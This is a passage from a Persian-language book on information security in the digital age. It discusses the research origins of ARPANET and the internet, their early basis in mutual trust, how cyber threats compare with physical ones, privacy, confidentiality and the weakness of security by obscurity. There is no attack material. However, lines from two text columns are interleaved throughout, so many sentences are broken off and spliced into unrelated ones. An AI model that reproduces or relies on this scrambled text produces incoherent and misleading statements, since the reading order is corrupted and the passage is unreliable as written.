ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻭ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﻣﻌﻘﻮﻻﻧـﻪﺍﻱ ﻛـﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﻣﺴﺌﻠﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻳـﻦ ﺭﺍﺑﻄـﻪ ﺍﺯ ﻓﺎﻳـﺪﺓ ﻻﺯﻡ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺣﻤﻠﻪ ﺑﻪ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ.
ﻧﺒﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﻣﻲﭘﺬﻳﺮﻳﻢ.
ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻭ ﺭﻭﺷـﻬﺎﻱ ﺣﻔـﺎﻇﺘﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺑـﻪ
ﺩﺭ ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ
ﺷﻜﻠﻲ ﺩﻳﮕﺮ ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺎ ﺑﻪ ﺁﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ ﺑـﺎ ﺗـﺪﺍﺑﻴﺮ
ﻼ ﻫﻤﻴـﺸﻪ ﻣـﺎﻳﻠﻴﻢ ﻋﻤـﺮﻱ ﻃـﻮﻻﻧﻲ ﻭ ﺩﺍﺭﻳﻢ ﻣﻤﻜﻦ ﻧﻴﺴﺖ .ﻣﺜ ﹰ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ ﺑﺎ ﻣﺎﻫﻴﺖ ﺁﻧﻬـﺎ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﺟﺴﻤﻲ ﺳﺎﻟﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ؛ ﻭﻟﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻣﻌـﺪﻝ ﺁﻣـﺎﺭﻱ
ﺁﺷﻨﺎ ﻧﻴﺴﺘﻴﻢ ،ﺍﻣﺎ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﻢ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﻃﻮﻝ ﻋﻤﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﺮﺍﻱ
ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ،ﺭﻭﺵ ﻛـﺎﺭﺑﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺻﺪﻕ ﻧﻤﻲﻛﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﻣـﺎ ﺩﺭ ﺳـﻨﻴﻦ ﭘـﺎﺋﻴﻦ
ﺑﺪﺍﻧﻴﻢ .ﻫﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻭ ﻫﻢ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ
ﻣﻲﻣﻴﺮﻳﻢ ،ﺗﻌﺪﺍﺩﻱ ﺩﺭ ﻃﻮﻝ ﺣﻴﺎﺕ ﺑﺎ ﺑﻴﻤﺎﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺳـﺖ
ﺣﻔﺎﻇﺖ ﻭ ﺩﻓﺎﻉ ﺍﺯ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺩﻳﮕﺮﺍﻥ ﻭ
ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻴﻢ ،ﻭ ﺑﺮﺧﻲ ﺗﺎ ﺳﺎﻟﻴﺎﻥ ﺩﺭﺍﺯ ﺯﻧﺪﻩ ﻣﻲﻣـﺎﻧﻴﻢ ﻭ
ﺩﺭﺻــﻮﺭﺕ ﻣﻮﻓﻘﻴــﺖﺁﻣﻴــﺰ ﺑــﻮﺩﻥ ﺣﻤــﻼﺕ ،ﺑــﺎﺯﭘﺲﮔﻴــﺮﻱ
ﻋﻤﺮﻱ ﺑﻪ ﺳﻼﻣﺖ ﺭﻭﺯﮔﺎﺭ ﻣﻲﮔﺬﺭﺍﻧﻴﻢ .ﻋـﺪﻡ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺩﺭ
ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﻣﻲﺑﺎﺷﻴﻢ.
٣٣ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺑﺮﻃﺮﻑ ﺳﺎﺧﺘﻦ ﺍﻳﻦ ﺍﺷـﻜﺎﻝ ﺭﻭﻱ ﭘﺎﻳــﮕﺎﻩ ﻭﺏ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺗﻌﺎﺭﻳﻒ ﻭ ﺗﻮﺿﻴﺤﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﺮﻫﻨﮕﻬـﺎﻱ ﻟﻐـﺎﺕ ﻭ ﻭﺍﮊﻩﻧﺎﻣـﻪﻫـﺎ
ﻗﺮﺍﺭﺩﻫﺪ ".... ﺑﺮﺍﻱ ﻭﺍﮊﺓ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﻪ ﻣـﻮﺍﺭﺩﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺎ
ﺑﺨﺶ ﺍﻭﻝ
ﻛﺮﺩ .ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﻘﻴﺎﺳﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﻢ ﻭ ﺍﻳﻦ ﺗﻨﻬﺎ ﺭﻭﺵ ﻣﻘﺎﺑﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ
ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ. ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﻢ.
ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﭼﻄـﻮﺭ ﺑﺎﻳـﺪ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ
ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ
ﺧــﻮﺩ ﺣﻔﺎﻇــﺖ ﻧﻤــﺎﻳﻴﻢ ﻭ ﻫﻤﭽﻨــﻴﻦ ﻣــﻲﺩﺍﻧــﻴﻢ ﻛــﻪ ﺑﻌــﻀﻲ ﺍﺯ
ﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣـﺮﻭﺯ ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑـﺎ ﻫـﺪﻑ
ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍ ﹺ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛـﺮﺩ ﻭ ﺑﺮﺧـﻲ ﺍﺯ
ﭘﮋﻭﻫﺶ ﻭ ﺁﻣﻮﺯﺵ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﺑـﻮﺩ .ﺯﻣﺎﻧﻴﻜـﻪ ARPANET ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩﺍﻧﻪ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ .ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ
)ﺍﻳﻨﺘﺮﻧﺖ ﺍﻭﻟﻴﻪ( ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺍﻳﺠﺎﺩ ﺷﺪ ،ﻫﺪﻑ ﺍﺻﻠﻲ ﺁﻥ ﺍﺷﺘﺮﺍﻙ ﺩﺭﻫﺎﻱ ﺩﻓﺎﺗﺮ ﻭ ﻛﻤﺪﻫﺎﻱ ﺣﺎﻭﻱ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻗﻔﻞ ﻣﻲﻛﻨﻴﻢ ﻭ ﺣﺘـﻲ
ﻣﻨﺎﺑﻊ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺘﻌﺪﺩ ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻬـﻢ ﺭﺍ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ
ﻣﺨﺘﻠﻒ ﺑﻮﺩ .ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻫﺪﺍﻑ ﻳﻜـﺴﺎﻥ ﺩﺍﺷـﺘﻨﺪ ﻭ ﺑـﺎ ﻫـﺪﻑ ﺍﺩﺍﺭﻩ ﻧﮕﻬﺪﺍﺭﻳﻢ ﺗﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﭼﻮﻥ ﺑﺮﻭﺯ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﻳﺎ ﺳـﺎﻳﺮ
ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺷﺘﻦ ﻣﻨﺎﺑﻊ ﻭ ﺩﺍﺩﻩﻫﺎ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﻢ .ﺑﻌﻀﻲ ﺍﻃﻼﻋﺎﺕ ﺭﺍ
ﺷﺒﻜﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﻋﻀﺎﻱ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻣﻲﺷﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺁﻥ ﺯﻣﺎﻥ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ ﻭ ﺑـﺴﺘﻪ ﺑـﻪ
ﻧﮕﺮﺍﻧﻲ ﭼﻨﺪﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﻧﺪﺍﺷـﺖ. ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻓـﺮﺍﺩ ﻣﺨﺘﻠـﻒ ﺩﺭ ﺳـﻄﻮﺡ
ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪ ﺟﻬﺎﻧﻲ ﻭﺏ ﻧﻴﺰ ﺑﺮ ﻫﻤﻴﻦ ﺍﺳﺎﺱ ﺷﻜﻞ ﮔﺮﻓﺖ ﺗـﺎ ﻣﺘﻔﺎﻭﺗﻲ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ.
ﻳﻚ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ
ﺍﺯ ﻧﻈــﺮ ﻣﻔﻬــﻮﻣﻲ ﻣﻴــﺎﻥ ﻣﺎﻫﻴــﺖ ﺗﻬﺪﻳــﺪﺍﺕ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻭ
ﺍﺧﺘﻴﺎﺭ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺷﺪ؛ ﺑﺪﻭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺮﺍﻱ ﻛﺴﺐ
ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻫﻴﭻ ﺗﻔﺎﻭﺗﻲ ﻧﻴـﺴﺖ،
ﻣﺠﻮﺯ ﻳﺎ ﺗﺴﻬﻴﻞ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻣﺎﻟﻲ.
ﺑﻠﻜﻪ ﺗﻔﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ ﻣﻘﻮﻟـﻪ ﺑﺮﺧﺎﺳـﺘﻪ ﺍﺯ ﺧـﺼﻮﺻﻴﺎﺕ ﻓـﻀﺎﻱ
ﻓﺮﻫﻨﮓ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻦ ﺣﻮﺯﻩ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ
ﺩﺍﻧﺸﮕﺎﻫﻴﺎﻥ ﻃﻲ ﺩﻫﺔ ۹۰ﺗﻮﺳﻂ ARPANETﻣﻄﺮﺡ ﺷـﺪ ﻭ ﺑﺘﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺧﻨﺜﻲ ،ﻳﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ
ﻫﻨﻮﺯ ﻫﻢ ﻧﺸﺎﻧﻪﻫـﺎﻳﻲ ﺍﺯ ﺁﻥ ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ .ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﺭﻓﻊ ﻧﻤﻮﺩ.
ﻓﺮﻫﻨﮓ ،ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﺗـﺎ ﺣـﺪ ﻣﻤﻜـﻦ ﺩﺭ
ﻋﻨﺎﻭﻳﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ٣٣ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ٣٤ﺑﺎ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺩﺳﺘﺮﺱ ﻭ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻭ ﺍﻣﻜﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﺻـﺪﻫﺎ
ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ .ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ "ﺧﺼﻮﺻﻲ" ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧـﺪ ﺗﻨﻬـﺎ
ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﻣﺮﺩﻡ ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺟﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺧﺼﻮﺻﻲ ﺑﻤﺎﻧﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺫﺧﻴﺮﻩ
ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻭ ﭘﺎﺳﺨﻲ ﺑﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﭼـﺮﺍ
ﺷﺪﻩ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﺭﻓﺘـﺎﺭ
ﺍﻳﻨﺘﺮﻧﺖ ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ ﺭﺷـﺪ ﺭﺳـﻴﺪﻩ ﺍﺳـﺖ .ﺟﻨﺒـﺔ
ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﮔﻮﻳﻲ ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺭﻧـﺪ .ﺍﻳـﻦ
ﺍﺧﻼﻗــﻲ ﺍﻳــﻦ ﻓﺮﻫﻨــﮓ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ ﻋﺎﻣﻴﺎﻧــﺔ ﻣﺮﺩﻣــﻲ ﻛــﻪ
ﺳﻴﺎﺳﺖ ﺭﺍ ﺍﻣﻨﻴـﺖ ﮔﻤﻨـﺎﻣﻲ ٣٥ﻣـﻲ ﻧﺎﻣﻨـﺪ .ﺑـﻪ ﻫﻤـﻴﻦ ﺗﺮﺗﻴـﺐ
ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﻨﺒﻌـﻲ ﺑـﺴﻴﺎﺭ ﺧـﻮﺏ ﻭ ﻣﻌﺘﺒـﺮ ﺗﻮﺻـﻴﻒ ﻣـﻲﻛﻨﻨـﺪ
ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔـﺬﺍﺭﺩﻩ ﺷـﻮﻧﺪ
ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﻗﺪﺭﺕ ﺭﺳﺎﻧﻪﺍﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﺛﺮﺍﺕ ﻛـﺎﺭ
ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ
ﺑﺎ ﺁﻧﺮﺍ ﺩﻳﺪﻩﺍﻧﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﻣﺎﻫﻴـﺖ ﺍﻳﻨﺘﺮﻧـﺖ ﮔﻔﺘـﻪ
ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ .ﺍﮔﺮ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻫﻤﻴﺸﻪ ﺩﺭ ﻳﻚ ﻣﻜﺎﻥ ﻧﻴﺴﺘﻨﺪ ﻫﻨﮕﺎﻡ
ﻣﻲﺷﻮﺩ ﻛﻪ "ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺗﻤﺎﻳﻞ ﺑﻪ ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺩﺍﺭﻧﺪ".
ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ
ﻳﻚ ﺗﻮﺟﻴﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻥ ﺍﻋﻤﺎﻝ ﺷﻮﺩ.
ﺍﺳﺖ ﻛﻪ ﻧﺴﻞ ﺍﻭﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﻤﺎﺩ ﻣﺘﻘﺎﺑﻞ ﺍﻳﺠﺎﺩ ﺷﺪﻩ
ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﻧﻈﻴﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ،
ﺑﻮﺩ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺷﻜﺎﺭﺍ ﺑﺮﺍﻱ ﻛـﺎﺭ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ ﻫـﻢ ﺍﻋﺘﻤـﺎﺩ
ﻭﻟﻲ ﺑﺎ ﻓﺮﺽ ﻃﺒﻴﻌـﺖ ﺧـﺎﺹ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ ﺍﺭﺗﺒـﺎﻁ ﻣﻴـﺎﻥ
ﻣﻲﻛﺮﺩﻧﺪ .ﺑﺎ ﮔﺴﺘﺮﺵ ﻭﺳﻴﻊ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑـﻪ ﻋـﻀﻮﻳﺖ ﺩﺭﺁﻣـﺪﻥ
ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺩﺭ ﺁﻥ ،ﺍﻣﻨﻴــﺖ ﮔﻤﻨــﺎﻣﻲ ﻳــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﻓﺮﺍﺩ ﺑﻴﺸﺘﺮ ﺑﺎ ﻋﻼﻳﻖ ﻭ ﺍﻫﺪﺍﻑ ﻣﺨﺘﻠﻒ ﺩﺭ ﺁﻥ ،ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ
ﭘﻨﻬﺎﻥﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻲ ﺿﻌﻴﻒ ﻣـﻲﻧﻤﺎﻳـﺪ ﻭ ﺑﺎﻳـﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨـﺎﺏ
ﻣﻌﻨﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻳﻜـﻲ ﺍﺯ ﻣﺒﺎﺣـﺚ
ﻋﻤﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻌﺔ ﻣﻔﻬـﻮﻡ ﻧـﻮﻳﻦ ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ ﺍﺳـﺖ
33 Privacy
34 Confidentiality
35 Security By Obscurity
٣٥ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻣﺆﺛﺮ ،ﻭﺍﻗﻊ ﮔﺮﺍﻳﺎﻧﻪ ،ﻭ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑـﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ ﻛﻪ ﻫﺮ ﺷﺒﻜﻪﺍﻱ ﻛـﻪ ﺑـﻪ ﺧـﺎﻧﻮﺍﺩﻩﺍﻱ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ ﺑﺎﺷﺪ.
ﺑﺨﺶ ﺍﻭﻝ
٣٨TCP/IPﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻥ ﻣﺘـﺼﻞ ﺷـﻮﺩ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻗﺒـﻞ ﺍﺯ ﺧـﻮﺩ ﭼﻨـﺪﻳﻦ ﺗﻔـﺎﻭﺕ
ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﻣﺤﺴﻮﺏ ﮔﺮﺩﺩ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺍﻳـﻦ ﺍﺳﺎﺳﻲ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺑﻌـﻀﻲ
ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﻨﺪ ﺗﻮﺳﻂ ٣٩IETFﺍﺭﺍﺋﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺍﺯ ﺍﻳﻦ ﺗﻔﺎﻭﺗﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑـﺎ ﺷـﺒﻜﺔ ﺗﻠﻔـﻦ ﻋﻤـﻮﻣﻲ
ﻻ ﺑﺪﻧﺔ ﻓﻨﻲ ﻏﻴﺮﺭﺳﻤﻲ ﺁﻧﻬﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺷﺎﻳـﺴﺘﻪﺳـﺎﻻﺭﻱ ﻣﻌﻤﻮ ﹰ
ﺳﻮﺋﻴﭻ ﺷﺪﻩ ) ٣٦(PSTNﻛـﻪ ﺭﻭﺯﺍﻧـﻪ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻓﻨﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻮﺍﻓﻘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﺩ.
